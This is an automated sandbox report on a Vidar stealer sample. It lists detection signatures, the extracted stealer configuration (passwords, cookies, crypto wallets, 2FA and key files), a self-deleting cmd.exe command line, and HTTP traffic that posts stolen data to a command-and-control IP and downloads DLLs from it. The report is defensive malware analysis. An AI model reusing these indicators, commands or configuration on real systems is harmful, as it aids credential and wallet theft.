Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report T6zZFfRLqs.exe

Overview

General Information

Sample Name:T6zZFfRLqs.exe
Analysis ID:491601
MD5:5d5e83e151a99bed97e13839e8881cb5
SHA1:4f008fe578e0f32ed5dda8d30883a900630f1be4
SHA256:1a0f891e8d7d659d550b35c54f542180cd2629d3a62e35e695e43fd1f5dad0b3
Tags:ArkeiStealerexe
Infos:

Most interesting Screenshot:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected unpacking (overwrites its own PE header)
Yara detected Vidar
Yara detected Vidar stealer
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Self deletion via cmd delete
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses taskkill to terminate processes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • T6zZFfRLqs.exe (PID: 6576 cmdline: 'C:\Users\user\Desktop\T6zZFfRLqs.exe' MD5: 5D5E83E151A99BED97E13839E8881CB5)
    • cmd.exe (PID: 6820 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6860 cmdline: taskkill /im T6zZFfRLqs.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • timeout.exe (PID: 6916 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Vidar

{"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Process Memory Space: T6zZFfRLqs.exe PID: 6576JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.T6zZFfRLqs.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                1.2.T6zZFfRLqs.exe.21f0e50.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    1.3.T6zZFfRLqs.exe.2330000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      1.2.T6zZFfRLqs.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 1 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: HTTP dataMalware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}
                        Machine Learning detection for sampleShow sources
                        Source: T6zZFfRLqs.exeJoe Sandbox ML: detected
                        Source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 1.3.T6zZFfRLqs.exe.2330000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00416200 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00416190 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00416340 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeUnpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack
                        Source: T6zZFfRLqs.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: unknownHTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
                        Source: Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
                        Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
                        Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
                        Source: Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
                        Source: Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
                        Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
                        Source: global trafficHTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 86263Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 88.99.75.82 88.99.75.82
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:09 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:09 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 